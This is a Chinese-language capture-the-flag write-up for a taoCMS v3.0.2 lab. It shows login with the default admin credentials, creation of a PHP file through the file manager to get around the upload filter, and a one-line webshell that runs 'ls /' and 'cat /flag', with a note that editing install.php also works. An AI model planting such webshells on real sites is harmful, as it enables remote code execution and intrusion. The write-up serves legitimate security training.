简介

春秋云境免费靶场挑战。
靶场介绍:taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码。

详解

  1. 打开页面随便点点,发现点管理会跳到一个登录页面。

1679965453115.png

  1. 百度一下默认账户admin,密码tao。尝试登录可以登录。

16799656818431.png

  1. 提示文件上传漏洞,点击文件管理,发现可以编辑文件,还能上传或者新建文件。

1679966094475.png

  1. 尝试上传个简单webshell,对后缀名过滤了,上传不了php文件。
  2. 那就试试新建文件,发现可以。并且可以编辑。创建shell.php,然后编辑写入webshell。

16799665202004.png

<?php
system($_GET[1]);
?>
  1. 尝试访问,并传参ls /。

http://eci-2ze6sij0ebixzvz39rhw.cloudeci1.ichunqiu.com/shell.php?1=ls%20/
页面显示:bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

  1. 有个flag,尝试传参cat /flag。
    http://eci-2ze6sij0ebixzvz39rhw.cloudeci1.ichunqiu.com/shell.php?1=cat%20/flag
  2. 成功获取到flag----flag{bcb7f369-2cd6-47ad-b522-591ce2bbd0bb}

结语

虽然获取到flag,但是后知后觉应该不需要创建文件,编辑已有文件直接写入webshell也可以。
尝试在install.php中写入webshell发现还真可以。